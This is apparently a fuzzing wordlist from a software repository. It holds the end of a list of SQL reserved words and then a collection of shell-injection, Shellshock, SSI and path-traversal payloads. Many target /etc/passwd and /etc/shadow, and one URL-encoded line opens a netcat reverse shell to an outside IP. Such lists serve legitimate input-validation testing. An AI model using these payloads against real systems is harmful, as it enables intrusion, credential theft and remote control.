 375 | DYNAMIC_FUNCTION_CODE
 376 | 
 377 | ELEMENT
 378 | 
 379 | ELSEIF
 380 | 
 381 | ENABLE
 382 | 
 383 | ENCLOSED
 384 | 
 385 | ENCODING
 386 | 
 387 | ENCRYPTED
 388 | 
 389 | END-EXEC
 390 | 
 391 | EQUALS
 392 | 
 393 | ERRLVL
 394 | 
 395 | ESCAPE
 396 | 
 397 | ESCAPED
 398 | 
 399 | EVERY
 400 | 
 401 | EXCEPT
 402 | 
 403 | EXCEPTION
 404 | 
 405 | EXCLUDE
 406 | 
 407 | EXCLUDING
 408 | 
 409 | EXCLUSIVE
 410 | 
 411 | EXECUTE
 412 | 
 413 | EXISTING
 414 | 
 415 | EXISTS
 416 | 
 417 | EXPLAIN
 418 | 
 419 | EXTERNAL
 420 | 
 421 | EXTRACT
 422 | 
 423 | FALSE
 424 | 
 425 | FETCH
 426 | 
 427 | FIELDS
 428 | 
 429 | FILE
 430 | 
 431 | FILLFACTOR
 432 | 
 433 | FILTER
 434 | 
 435 | FINAL
 436 | 
 437 | FIRST
 438 | 
 439 | FLOAT
 440 | 
 441 | FLOAT4
 442 | 
 443 | FLOAT8
 444 | 
 445 | FLOOR
 446 | 
 447 | FLUSH
 448 | 
 449 | FOLLOWING
 450 | 
 451 | FORCE
 452 | 
 453 | FOREIGN
 454 | 
 455 | FORTRAN
 456 | 
 457 | FORWARD
 458 | 
 459 | FREETEXT
 460 | 
 461 | FREETEXTTABLE
 462 | 
 463 | FREEZE
 464 | 
 465 | FULLTEXT
 466 | 
 467 | FUNCTION
 468 | 
 469 | FUSION
 470 | 
 471 | GENERAL
 472 | 
 473 | GENERATED
 474 | 
 475 | GLOBAL
 476 | 
 477 | GOTO
 478 | 
 479 | GRANT
 480 | 
 481 | GRANTED
 482 | 
 483 | GRANTS
 484 | 
 485 | GREATEST
 486 | 
 487 | GROUP
 488 | 
 489 | GROUPING
 490 | 
 491 | HANDLER
 492 | 
 493 | HAVING
 494 | 
 495 | HEADER
 496 | 
 497 | HEAP
 498 | 
 499 | HIERARCHY
 500 | 
 501 | HIGH_PRIORITY
 502 | 
 503 | HOLDLOCK
 504 | 
 505 | HOUR_MICROSECOND
 506 | 
 507 | HOUR_MINUTE
 508 | 
 509 | HOUR_SECOND
 510 | 
 511 | IDENTIFIED
 512 | 
 513 | IDENTITY
 514 | 
 515 | IDENTITY_INSERT
 516 | 
 517 | IDENTITYCOL
 518 | 
 519 | IGNORE
 520 | 
 521 | ILIKE
 522 | 
 523 | IMMEDIATE
 524 | 
 525 | IMMUTABLE
 526 | 
 527 | IMPLEMENTATION
 528 | 
 529 | IMPLICIT
 530 | 
 531 | INCLUDE
 532 | 
 533 | INCLUDING
 534 | 
 535 | INCREMENT
 536 | 
 537 | INDEX
 538 | 
 539 | INDICATOR
 540 | 
 541 | INFILE
 542 | 
 543 | INFIX
 544 | 
 545 | INHERIT
 546 | 
 547 | INHERITS
 548 | 
 549 | INITIAL
 550 | 
 551 | INITIALIZE
 552 | 
 553 | INITIALLY
 554 | 
 555 | INNER
 556 | 
 557 | INOUT
 558 | 
 559 | INPUT
 560 | 
 561 | INSENSITIVE
 562 | 
 563 | INSERT
 564 | 
 565 | INSERT_ID
 566 | 
 567 | INSTANCE
 568 | 
 569 | INSTANTIABLE
 570 | 
 571 | INSTEAD
 572 | 
 573 | INT1
 574 | 
 575 | INT2
 576 | 
 577 | INT3
 578 | 
 579 | INT4
 580 | 
 581 | INT8
 582 | 
 583 | INTEGER
 584 | 
 585 | INTERSECT
 586 | 
 587 | INTERSECTION
 588 | 
 589 | INTERVAL
 590 | 
 591 | INTO
 592 | 
 593 | INVOKER
 594 | 
 595 | ISAM
 596 | 
 597 | ISNULL
 598 | 
 599 | ISOLATION
 600 | 
 601 | ITERATE
 602 | 
 603 | JOIN
 604 | 
 605 | KEY_MEMBER
 606 | 
 607 | KEY_TYPE
 608 | 
 609 | KEYS
 610 | 
 611 | KILL
 612 | 
 613 | LANCOMPILER
 614 | 
 615 | LANGUAGE
 616 | 
 617 | LARGE
 618 | 
 619 | LAST
 620 | 
 621 | LAST_INSERT_ID
 622 | 
 623 | LATERAL
 624 | 
 625 | LEADING
 626 | 
 627 | LEAST
 628 | 
 629 | LEAVE
 630 | 
 631 | LEFT
 632 | 
 633 | LENGTH
 634 | 
 635 | LESS
 636 | 
 637 | LEVEL
 638 | 
 639 | LIKE
 640 | 
 641 | LIMIT
 642 | 
 643 | LINENO
 644 | 
 645 | LINES
 646 | 
 647 | LISTEN
 648 | 
 649 | LOCAL
 650 | 
 651 | LOCALTIME
 652 | 
 653 | LOCALTIMESTAMP
 654 | 
 655 | LOCATION
 656 | 
 657 | LOCATOR
 658 | 
 659 | LOGIN
 660 | 
 661 | LOGS
 662 | 
 663 | LONGBLOB
 664 | 
 665 | LONGTEXT
 666 | 
 667 | LOOP
 668 | 
 669 | LOW_PRIORITY
 670 | 
 671 | LOWER
 672 | 
 673 | MATCH
 674 | 
 675 | MATCHED
 676 | 
 677 | MAX_ROWS
 678 | 
 679 | MAXEXTENTS
 680 | 
 681 | MAXVALUE
 682 | 
 683 | MEDIUMBLOB
 684 | 
 685 | MEDIUMINT
 686 | 
 687 | MEDIUMTEXT
 688 | 
 689 | MEMBER
 690 | 
 691 | MERGE
 692 | 
 693 | MESSAGE_LENGTH
 694 | 
 695 | MESSAGE_OCTET_LENGTH
 696 | 
 697 | MESSAGE_TEXT
 698 | 
 699 | METHOD
 700 | 
 701 | MIDDLEINT
 702 | 
 703 | MIN_ROWS
 704 | 
 705 | MINUTE_MICROSECOND
 706 | 
 707 | MINUTE_SECOND
 708 | 
 709 | MINVALUE
 710 | 
 711 | MLSLABEL
 712 | 
 713 | MODIFIES
 714 | 
 715 | MODIFY
 716 | 
 717 | MODULE
 718 | 
 719 | MONTH
 720 | 
 721 | MONTHNAME
 722 | 
 723 | MULTISET
 724 | 
 725 | MUMPS
 726 | 
 727 | MYISAM
 728 | 
 729 | NATIONAL
 730 | 
 731 | NATURAL
 732 | 
 733 | NCHAR
 734 | 
 735 | NCLOB
 736 | 
 737 | NESTING
 738 | 
 739 | NEXT
 740 | 
 741 | NO_WRITE_TO_BINLOG
 742 | 
 743 | NOAUDIT
 744 | 
 745 | NOCHECK
 746 | 
 747 | NOCOMPRESS
 748 | 
 749 | NOCREATEDB
 750 | 
 751 | NOCREATEROLE
 752 | 
 753 | NOCREATEUSER
 754 | 
 755 | NOINHERIT
 756 | 
 757 | NOLOGIN
 758 | 
 759 | NONCLUSTERED
 760 | 
 761 | NORMALIZE
 762 | 
 763 | NORMALIZED
 764 | 
 765 | NOSUPERUSER
 766 | 
 767 | NOTHING
 768 | 
 769 | NOTIFY
 770 | 
 771 | NOTNULL
 772 | 
 773 | NOWAIT
 774 | 
 775 | NULL
 776 | 
 777 | NULLABLE
 778 | 
 779 | NULLIF
 780 | 
 781 | NULLS
 782 | 
 783 | NUMBER
 784 | 
 785 | NUMERIC
 786 | 
 787 | OBJECT
 788 | 
 789 | OCTET_LENGTH
 790 | 
 791 | OCTETS
 792 | 
 793 | OFFLINE
 794 | 
 795 | OFFSET
 796 | 
 797 | OFFSETS
 798 | 
 799 | OIDS
 800 | 
 801 | OPENDATASOURCE
 802 | 
 803 | OPENQUERY
 804 | 
 805 | OPENROWSET
 806 | 
 807 | OPENXML
 808 | 
 809 | OPERATION
 810 | 
 811 | OPERATOR
 812 | 
 813 | OPTIMIZE
 814 | 
 815 | OPTION
 816 | 
 817 | OPTIONALLY
 818 | 
 819 | OPTIONS
 820 | 
 821 | ORDER
 822 | 
 823 | ORDERING
 824 | 
 825 | ORDINALITY
 826 | 
 827 | OTHERS
 828 | 
 829 | OUTER
 830 | 
 831 | OUTFILE
 832 | 
 833 | OVERLAPS
 834 | 
 835 | OVERLAY
 836 | 
 837 | OVERRIDING
 838 | 
 839 | OWNER
 840 | 
 841 | PACK_KEYS
 842 | 
 843 | PARAMETER
 844 | 
 845 | PARAMETER_MODE
 846 | 
 847 | PARAMETER_NAME
 848 | 
 849 | PARAMETER_ORDINAL_POSITION
 850 | 
 851 | PARAMETER_SPECIFIC_CATALOG
 852 | 
 853 | PARAMETER_SPECIFIC_NAME
 854 | 
 855 | PARAMETER_SPECIFIC_SCHEMA
 856 | 
 857 | PARAMETERS
 858 | 
 859 | PARTIAL
 860 | 
 861 | PARTITION
 862 | 
 863 | PASCAL
 864 | 
 865 | PASSWORD
 866 | 
 867 | PATH
 868 | 
 869 | PCTFREE
 870 | 
 871 | PERCENT
 872 | 
 873 | PERCENT_RANK
 874 | 
 875 | PERCENTILE_CONT
 876 | 
 877 | PERCENTILE_DISC
 878 | 
 879 | PLACING
 880 | 
 881 | PLAN
 882 | 
 883 | POSITION
 884 | 
 885 | POSTFIX
 886 | 
 887 | POWER
 888 | 
 889 | PRECEDING
 890 | 
 891 | PRECISION
 892 | 
 893 | PREFIX
 894 | 
 895 | PREORDER
 896 | 
 897 | PREPARE
 898 | 
 899 | PREPARED
 900 | 
 901 | PRESERVE
 902 | 
 903 | PRIMARY
 904 | 
 905 | PRINT
 906 | 
 907 | PRIOR
 908 | 
 909 | PRIVILEGES
 910 | 
 911 | PROC
 912 | 
 913 | PROCEDURAL
 914 | 
 915 | PROCEDURE
 916 | 
 917 | PROCESS
 918 | 
 919 | PROCESSLIST
 920 | 
 921 | PUBLIC
 922 | 
 923 | PURGE
 924 | 
 925 | QUOTE
 926 | 
 927 | RAID0
 928 | 
 929 | RAISERROR
 930 | 
 931 | READS
 932 | 
 933 | READTEXT
 934 | 
 935 | 
 936 | RECHECK
 937 | 
 938 | RECONFIGURE
 939 | 
 940 | RECURSIVE
 941 | 
 942 | REFERENCES
 943 | 
 944 | REFERENCING
 945 | 
 946 | REGEXP
 947 | 
 948 | REGR_AVGX
 949 | 
 950 | REGR_AVGY
 951 | 
 952 | REGR_COUNT
 953 | 
 954 | REGR_INTERCEPT
 955 | 
 956 | REGR_R2
 957 | 
 958 | REGR_SLOPE
 959 | 
 960 | REGR_SXX
 961 | 
 962 | REGR_SXY
 963 | 
 964 | REGR_SYY
 965 | 
 966 | REINDEX
 967 | 
 968 | RELATIVE
 969 | 
 970 | RELEASE
 971 | 
 972 | RELOAD
 973 | 
 974 | RENAME
 975 | 
 976 | REPEAT
 977 | 
 978 | REPEATABLE
 979 | 
 980 | REPLACE
 981 | 
 982 | REPLICATION
 983 | 
 984 | REQUIRE
 985 | 
 986 | RESET
 987 | 
 988 | RESIGNAL
 989 | 
 990 | RESOURCE
 991 | 
 992 | RESTART
 993 | 
 994 | RESTORE
 995 | 
 996 | RESTRICT
 997 | 
 998 | RESULT
 999 | 
1000 | RETURN
1001 | 
1002 | RETURNED_CARDINALITY
1003 | 
1004 | RETURNED_LENGTH
1005 | 
1006 | RETURNED_OCTET_LENGTH
1007 | 
1008 | RETURNED_SQLSTATE
1009 | 
1010 | RETURNS
1011 | 
1012 | REVOKE
1013 | 
1014 | RLIKE
1015 | 
1016 | ROLLBACK
1017 | 
1018 | ROLLUP
1019 | 
1020 | ROUTINE
1021 | 
1022 | ROUTINE_CATALOG
1023 | 
1024 | ROUTINE_NAME
1025 | 
1026 | ROUTINE_SCHEMA
1027 | 
1028 | ROW_COUNT
1029 | 
1030 | ROW_NUMBER
1031 | 
1032 | ROWCOUNT
1033 | 
1034 | ROWGUIDCOL
1035 | 
1036 | ROWID
1037 | 
1038 | ROWNUM
1039 | 
1040 | SAVEPOINT
1041 | 
1042 | SCALE
1043 | 
1044 | SCHEMA
1045 | 
1046 | SCHEMA_NAME
1047 | 
1048 | SCHEMAS
1049 | 
1050 | SCOPE
1051 | 
1052 | SCOPE_CATALOG
1053 | 
1054 | SCOPE_NAME
1055 | 
1056 | SCOPE_SCHEMA
1057 | 
1058 | SCROLL
1059 | 
1060 | SEARCH
1061 | 
1062 | SECOND
1063 | 
1064 | SECOND_MICROSECOND
1065 | 
1066 | SECTION
1067 | 
1068 | SECURITY
1069 | 
1070 | SELECT
1071 | 
1072 | SENSITIVE
1073 | 
1074 | SEPARATOR
1075 | 
1076 | SEQUENCE
1077 | 
1078 | SERIALIZABLE
1079 | 
1080 | SERVER_NAME
1081 | 
1082 | SESSION
1083 | 
1084 | SESSION_USER
1085 | 
1086 | SETOF
1087 | 
1088 | SETUSER
1089 | 
1090 | SHUTDOWN
1091 | 
1092 | SMALLINT
1093 | 
1094 | SONAME
1095 | 
1096 | SOURCE
1097 | 
1098 | SPACE
1099 | 
1100 | SPATIAL
1101 | 
1102 | SPECIFIC
1103 | 
1104 | SPECIFIC_NAME
1105 | 
1106 | SPECIFICTYPE
1107 | 
1108 | SQL_BIG_RESULT
1109 | 
1110 | SQL_BIG_SELECTS
1111 | 
1112 | SQL_BIG_TABLES
1113 | 
1114 | SQL_CALC_FOUND_ROWS
1115 | 
1116 | SQL_LOG_OFF
1117 | 
1118 | SQL_LOG_UPDATE
1119 | 
1120 | SQL_LOW_PRIORITY_UPDATES
1121 | 
1122 | SQL_SELECT_LIMIT
1123 | 
1124 | SQL_SMALL_RESULT
1125 | 
1126 | SQL_WARNINGS
1127 | 
1128 | SQLCA
1129 | 
1130 | SQLCODE
1131 | 
1132 | SQLERROR
1133 | 
1134 | SQLEXCEPTION
1135 | 
1136 | SQLSTATE
1137 | 
1138 | SQLWARNING
1139 | 
1140 | SQRT
1141 | 
1142 | STABLE
1143 | 
1144 | START
1145 | 
1146 | STARTING
1147 | 
1148 | STATE
1149 | 
1150 | STATEMENT
1151 | 
1152 | STATIC
1153 | 
1154 | STATISTICS
1155 | 
1156 | STATUS
1157 | 
1158 | STDDEV_POP
1159 | 
1160 | STDDEV_SAMP
1161 | 
1162 | STDIN
1163 | 
1164 | STDOUT
1165 | 
1166 | STORAGE
1167 | 
1168 | STRAIGHT_JOIN
1169 | 
1170 | STRICT
1171 | 
1172 | STRING
1173 | 
1174 | STRUCTURE
1175 | 
1176 | STYLE
1177 | 
1178 | SUBCLASS_ORIGIN
1179 | 
1180 | SUBLIST
1181 | 
1182 | SUBMULTISET
1183 | 
1184 | SUBSTRING
1185 | 
1186 | SUCCESSFUL
1187 | 
1188 | SUPERUSER
1189 | 
1190 | SYMMETRIC
1191 | 
1192 | SYNONYM
1193 | 
1194 | SYSDATE
1195 | 
1196 | SYSID
1197 | 
1198 | SYSTEM
1199 | 
1200 | SYSTEM_USER
1201 | 
1202 | TABLE
1203 | 
1204 | TABLE_NAME
1205 | 
1206 | TABLES
1207 | 
1208 | TABLESAMPLE
1209 | 
1210 | TABLESPACE
1211 | 
1212 | TEMPLATE
1213 | 
1214 | TEMPORARY
1215 | 
1216 | TERMINATE
1217 | 
1218 | TERMINATED
1219 | 
1220 | TIMESTAMP
1221 | 
1222 | TIMEZONE_HOUR
1223 | 
1224 | TIMEZONE_MINUTE
1225 | 
1226 | TINYBLOB
1227 | 
1228 | TINYINT
1229 | 
1230 | TINYTEXT
1231 | 
1232 | TOP_LEVEL_COUNT
1233 | 
1234 | TRAILING
1235 | 
1236 | TRANSACTION
1237 | 
1238 | TRANSACTION_ACTIVE
1239 | 
1240 | TRANSACTIONS_COMMITTED
1241 | 
1242 | TRANSACTIONS_ROLLED_BACK
1243 | 
1244 | TRANSFORM
1245 | 
1246 | TRANSFORMS
1247 | 
1248 | TRANSLATE
1249 | 
1250 | TRANSLATION
1251 | 
1252 | TREAT
1253 | 
1254 | TRIGGER
1255 | 
1256 | TRIGGER_CATALOG
1257 | 
1258 | TRIGGER_NAME
1259 | 
1260 | TRIGGER_SCHEMA
1261 | 
1262 | TRIM
1263 | 
1264 | TRUE
1265 | 
1266 | TRUNCATE
1267 | 
1268 | TRUSTED
1269 | 
1270 | TSEQUAL
1271 | 
1272 | TYPE
1273 | 
1274 | UESCAPE
1275 | 
1276 | UID
1277 | 
1278 | UNBOUNDED
1279 | 
1280 | UNCOMMITTED
1281 | 
1282 | UNDER
1283 | 
1284 | UNDO
1285 | 
1286 | UNENCRYPTED
1287 | 
1288 | UNION
1289 | 
1290 | UNIQUE
1291 | 
1292 | UNKNOWN
1293 | 
1294 | UNLISTEN
1295 | 
1296 | UNLOCK
1297 | 
1298 | UNNAMED
1299 | 
1300 | UNNEST
1301 | 
1302 | UNSIGNED
1303 | 
1304 | UNTIL
1305 | 
1306 | UPDATE
1307 | 
1308 | UPDATETEXT
1309 | 
1310 | UPPER
1311 | 
1312 | USAGE
1313 | 
1314 | USER_DEFINED_TYPE_CATALOG
1315 | 
1316 | USER_DEFINED_TYPE_CODE
1317 | 
1318 | USER_DEFINED_TYPE_NAME
1319 | 
1320 | USER_DEFINED_TYPE_SCHEMA
1321 | 
1322 | USING
1323 | 
1324 | UTC_DATE
1325 | 
1326 | UTC_TIME
1327 | 
1328 | UTC_TIMESTAMP
1329 | 
1330 | VACUUM
1331 | 
1332 | VALID
1333 | 
1334 | VALIDATE
1335 | 
1336 | VALIDATOR
1337 | 
1338 | VALUE
1339 | 
1340 | VALUES
1341 | 
1342 | VAR_POP
1343 | 
1344 | VAR_SAMP
1345 | 
1346 | VARBINARY
1347 | 
1348 | VARCHAR
1349 | 
1350 | VARCHAR2
1351 | 
1352 | VARCHARACTER
1353 | 
1354 | VARIABLE
1355 | 
1356 | VARIABLES
1357 | 
1358 | VARYING
1359 | 
1360 | VERBOSE
1361 | 
1362 | VOLATILE
1363 | 
1364 | WAITFOR
1365 | 
1366 | WHENEVER
1367 | 
1368 | WHERE
1369 | 
1370 | WHILE
1371 | 
1372 | WIDTH_BUCKET
1373 | 
1374 | WINDOW
1375 | 
1376 | WITH
1377 | 
1378 | WITHIN
1379 | 
1380 | WITHOUT
1381 | 
1382 | WORK
1383 | 
1384 | WRITE
1385 | 
1386 | WRITETEXT
1387 | 
1388 | X509
1389 | 
1390 | XOR
1391 | 
1392 | YEAR
1393 | 
1394 | YEAR_MONTH
1395 | 
1396 | ZEROFILL
1397 | 
1398 | ZONE
1399 | 


--------------------------------------------------------------------------------
/data/ShellCollection.txt:
--------------------------------------------------------------------------------
  1 | () { 0; }; touch /tmp/blns.shellshock1.fail;
  2 | () { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }
  3 | <<< %s(un='%s') = %u
  4 | '+++ATH0
  5 | /dev/null; touch /tmp/blns.fail ; echo
  6 | `touch /tmp/blns.fail`
  7 | $(touch /tmp/blns.fail)
  8 | @{[system "touch /tmp/blns.fail"]}
  9 | eval("puts 'hello world'")
 10 | System("ls -al /")
 11 | `ls -al /`
 12 | Kernel.exec("ls -al /")
 13 | Kernel.exit(1)
 14 | %x('ls -al /')
 15 | $HOME
 16 | $ENV{'HOME'}
 17 | File:///b'/../../../../file'
 18 | \\..\\..\\..\\..\\file'
 19 | \\../\\../\\../file'
 20 | /..\\/..\\file.txt'
 21 | /%c0%ae/WEB-INF/web.xml'
 22 | /webapp/WEB-INF./web.xml'
 23 | /.........................../../../../file'
 24 | /...........................\\..\\..\\..\\file'
 25 | /..//..//..//..//file'
 26 | /..///..///..///..///file'
 27 | /..\\\\..\\\\..\\\\..\\\\file'
 28 | /..\\\\\\..\\\\\\..\\\\\\file'
 29 | /./\\/././\\/./file'
 30 | /.\\/\\.\\.\\/\\.\\file'
 31 | /././././././././././././file'
 32 | /.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\file'
 33 | /./.././.././../file'
 34 | /.\\..\\.\\..\\.\\..\\file'
 35 | /.//..//.//..//.//..//file'
 36 | /.\\\\..\\\\.\\\\..\\\\.\\..\\\\file'
 37 | /.//././/././/./boot.ini'
 38 | /../..//../..//file'
 39 | /..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/dir%5C/file'
 40 | /..\\/..\\/..\\/..\\/..\\/..\\/..\\/file'
 41 | /.../.../.../.../.../file'
 42 | /..%2E/..%2E/..%2E/..%2E/..%2E/file'
 43 | /..%2F..%2F..%2F..%2Fetc/mtc'
 44 | /..%5c..%5C..%5Cfile'
 45 | /%2E%2E/%2E%2E/%2E%2E/etc/mtc'
 46 | /%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fmtc'
 47 | /..%252f..%252F..%252fetc/mtc'
 48 | /%252E%252E/%252E%252E/%252E%252E/etc/mtc'
 49 | /%252E%252E%252f%252E%252E%252f%252E%252E%252ffile'
 50 | /..%255c..%255c..%255cboot.ini'
 51 | /%252E%252E\\%252E%252E\\%252E%252E\\file'
 52 | /%2e%2e%5c%2e%2e%5c%2e%2e%5cfile'
 53 | /%252E%252E%255c%252E%252E%255c%252E%252E%255cfile.ini'
 54 | ..%c0%af..%c0%af..%c0%affile'
 55 | /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/file'
 56 | /%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%affile'
 57 | /..%25c0%25af..%25c0%25affile'
 58 | /%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/file'
 59 | /%25c0%25ae%25c0%25ae%25c0%25affile'
 60 | /..%c1%9c..%c1%9c\\file'
 61 | /%c0%ae%c0%ae\\%c0%ae%c0%ae\\file'
 62 | /%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cfile'
 63 | ..%25c1%259c..%25c1%259cfile'
 64 | /%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\file'
 65 | /%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9cfile'
 66 | /..%%32%66..%%32%66..%%32%66file.ini'
 67 | %%32%65%%32%65/%%32%65%%32%65/file.ini'
 68 | /%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66file.ini'
 69 | /..%%35%63..%%35%63file'
 70 | /%%32%65%%32%65\\%%32%65%%32%65\\file'
 71 | /%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63file'
 72 | /%%32e%%32e%%32f%%32e%%32e%%32f%%32e%%32e%%32ffile'
 73 | /%2%65%2%65%2%66%2%65%2%65%2%66%2%65%2%65%2%66file'
 74 | /%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002ffile'
 75 | ../../../file'
 76 | ..%2f..%2f..%2ffile'
 77 | %2e%2e/%2e%2e/file'
 78 | %2e%2e%2f%2e%2e%2ffile'
 79 | ../../../file%00'
 80 | .........................../../../../file'
 81 | ...........................\\..\\..\\..\\file'
 82 | ../../../../../filename/////[...]/////'
 83 | ../../../../../file//////////////'
 84 | /../etc/./passwd%00'
 85 | /../etc/./passwd'
 86 | /showcode.php/C:Windows/aaa.txt'
 87 | file:///etc/hosts'
 88 | data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4='
 89 | ../etc/./hosts'
 90 | ../../etc/././././hosts'
 91 | php://filter/read=convert.base64-encode/resource=index.php'
 92 | ../../../../etc/aaa/../hosts'
 93 | ../../../../etc/aaa/../aaa/bbb/../../hosts'
 94 | ..////////////..////////////////..///////////////../etc//////////hosts'
 95 | ../../../../etc/hosts/.'
 96 | /etc/passwd/./././././.'
 97 | /etc/hosts///////////'
 98 | http://localhost/aa.txt'
 99 | www.site.com/aa.txt'
100 | ;ls+-al;'
101 | |+ping+|'
102 | &&+ping'
103 | %0a+ping+localhost+-i+3'
104 | ..%2F..%2F..%2Fbin/ls%20-al|'
105 | ..%c0%af..%c0%af../bin/ls%20-al|'
106 | %31%3b%6c%73%20%2d%61%6c%3b'
107 | %31%3b%6e%63%20%2d%65%20%2f%62%69%6e%2f%73%68%20%31%2e%31%2e%31%2e%31%20%33%33'
108 | +|+Dir+c:\
109 | $+|+Dir+c:\
110 | %26%26+|+dir c:\
111 | $%26%26dir c:\
112 | %0a+dir+c:\
113 | +|+Dir+c:%255c
114 | $+|+Dir+c:%255c
115 | %26%26+|+dir c:%255c
116 | $%26%26dir+c:%255c
117 | %0a+dir+c:%255c
118 | +|+Dir+c:%2f
119 | $+|+Dir+c:%2f
120 | %26%26+|+dir c:%2f
121 | $%26%26dir+c:%2f
122 | %0a+dir+c:%2f
123 | +dir+c:\+|
124 | +|+dir+c:\+|
125 | +|+dir+c:%2f+|
126 | dir+c:\
127 | ||+dir|c:\
128 | <!--#exec cmd="/usr/bin/id"-->
129 | <!--#exec cmd="id"-->
130 | /index.html|id|
131 | ;id;
132 | ;id
133 | ;netstat -a;
134 | ;id;
135 | |id
136 | |/usr/bin/id
137 | |id|
138 | |/usr/bin/id|
139 | ||/usr/bin/id|
140 | |id;
141 | ||/usr/bin/id;
142 | ;id|
143 | ;|/usr/bin/id|
144 | \n/bin/ls -al\n
145 | \n/usr/bin/id\n
146 | \nid\n
147 | \n/usr/bin/id;
148 | \nid;
149 | \n/usr/bin/id|
150 | \nid|
151 | ;/usr/bin/id\n
152 | ;id\n
153 | |usr/bin/id\n
154 | |nid\n
155 | `id`
156 | `/usr/bin/id`
157 | a);id
158 | a;id
159 | a);id;
160 | a;id;
161 | a);id|
162 | a;id|
163 | a)|id
164 | a|id
165 | a)|id;
166 | a|id
167 | |/bin/ls -al
168 | a);/usr/bin/id
169 | a;/usr/bin/id
170 | a);/usr/bin/id;
171 | a;/usr/bin/id;
172 | a);/usr/bin/id|
173 | a;/usr/bin/id|
174 | a)|/usr/bin/id
175 | a|/usr/bin/id
176 | a)|/usr/bin/id;
177 | a|/usr/bin/id
178 | ;system('cat%20/etc/passwd')
179 | ;system('id')
180 | ;system('/usr/bin/id')
181 | %0Acat%20/etc/passwd
182 | %0A/usr/bin/id
183 | %0A/usr/bin/id%0A
184 | & ping -i 30 127.0.0.1 &
185 | & ping -n 30 127.0.0.1 &
186 | %0a ping -i 30 127.0.0.1 %0a
187 | `ping 127.0.0.1`
188 | | id
189 | & id
190 | ; id
191 | %0a id %0a
192 | `id`
193 | $;/usr/bin/id
194 | {cmd}
195 | ;{cmd}
196 | ;{cmd};
197 | ^{cmd}
198 | |{cmd}
199 | <{cmd}
200 | <{cmd};
201 | <{cmd}\n
202 | <{cmd}%0D
203 | <{cmd}%0A
204 | &{cmd}
205 | &{cmd}&
206 | &&{cmd}
207 | &&{cmd}&&
208 | %0D{cmd}
209 | %0D{cmd}%0D
210 | %0A{cmd}
211 | %0A{cmd}%0A
212 | \n{cmd}
213 | \n{cmd}\n
214 | '{cmd}'
215 | `{cmd}`
216 | ;{cmd}|
217 | ;{cmd}/n
218 | |{cmd};
219 | a);{cmd}
220 | a;{cmd}
221 | a);{cmd}
222 | a;{cmd};
223 | a);{cmd}|
224 | FAIL||{cmd}
225 | CMD=$'{cmd}';$CMD
226 | ;CMD=$'{cmd}';$CMD
227 | ^CMD=$'{cmd}';$CMD
228 | |CMD=$'{cmd}';$CMD
229 | &CMD=$'{cmd}';$CMD
230 | &&CMD=$'{cmd}';$CMD
231 | %0DCMD=$'{cmd}';$CMD
232 | FAIL||CMD=$'{cmd}';$CMD
233 | CMD=$\'{cmd}\';$CMD
234 | ;CMD=$\'{cmd}\';$CMD
235 | ^CMD=$\'{cmd}\';$CMD
236 | |CMD=$\'{cmd}\';$CMD
237 | &CMD=$\'{cmd}\';$CMD
238 | &&CMD=$\'{cmd}\';$CMD
239 | %0DCMD=$\'{cmd}\';$CMD
240 | FAIL||CMD=$\'{cmd}\';$CMD
241 | CMD=$"{cmd}";$CMD
242 | ;CMD=$"{cmd}";$CMD
243 | ^CMD=$"{cmd}";$CMD
244 | |CMD=$"{cmd}";$CMD
245 | &CMD=$"{cmd}";$CMD
246 | &&CMD=$"{cmd}";$CMD
247 | %0DCMD=$"{cmd}";$CMD
248 | FAIL||CMD=$"{cmd}";$CMD
249 | <!--#exec cmd="{cmd}"-->
250 | ;system('{cmd}')
251 | ../../../../../../../../../../../../etc/hosts%00
252 | ../../../../../../../../../../../../etc/hosts
253 | ../../boot.ini
254 | /../../../../../../../../%2A
255 | ../../../../../../../../../../../../etc/passwd%00
256 | ../../../../../../../../../../../../etc/passwd
257 | ../../../../../../../../../../../../etc/shadow%00
258 | ../../../../../../../../../../../../etc/shadow
259 | /../../../../../../../../../../etc/passwd^^
260 | /../../../../../../../../../../etc/shadow^^
261 | /../../../../../../../../../../etc/passwd
262 | /../../../../../../../../../../etc/shadow
263 | /./././././././././././etc/passwd
264 | /./././././././././././etc/shadow
265 | \..\..\..\..\..\..\..\..\..\..\etc\passwd
266 | \..\..\..\..\..\..\..\..\..\..\etc\shadow
267 | ..\..\..\..\..\..\..\..\..\..\etc\passwd
268 | ..\..\..\..\..\..\..\..\..\..\etc\shadow
269 | /..\../..\../..\../..\../..\../..\../etc/passwd
270 | /..\../..\../..\../..\../..\../..\../etc/shadow
271 | .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
272 | .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
273 | \..\..\..\..\..\..\..\..\..\..\etc\passwd%00
274 | \..\..\..\..\..\..\..\..\..\..\etc\shadow%00
275 | ..\..\..\..\..\..\..\..\..\..\etc\passwd%00
276 | ..\..\..\..\..\..\..\..\..\..\etc\shadow%00
277 | %0a/bin/cat%20/etc/passwd
278 | %0a/bin/cat%20/etc/shadow
279 | %00/etc/passwd%00
280 | %00/etc/shadow%00
281 | %00../../../../../../etc/passwd
282 | %00../../../../../../etc/shadow
283 | /../../../../../../../../../../../etc/passwd%00.jpg
284 | /../../../../../../../../../../../etc/passwd%00.html
285 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
286 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
287 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
